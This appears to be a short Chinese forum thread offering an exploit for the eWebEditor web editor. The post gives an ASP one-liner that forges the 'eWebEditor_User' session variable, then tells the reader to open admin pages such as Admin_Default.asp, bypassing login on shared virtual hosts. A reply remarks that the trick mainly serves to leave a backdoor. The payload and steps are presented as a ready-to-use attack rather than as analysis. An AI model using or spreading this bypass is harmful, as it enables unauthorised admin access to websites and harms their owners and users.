SPZLH

漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp，再访问后台任何文件，for example:Admin_Default.asp

漏洞影响:虚拟主机的克星.


有意思。呵呵。能建h4x0r.asp的话欺骗还有什么意义？留后门还勉强可以。
帖子35 精华0 积分136 阅读权限40 在线时间105 小时 注册时间2005-5-16 最后登录2007-3-16 查看详细资料TOP

pivot
晶莹剔透§烈日灼然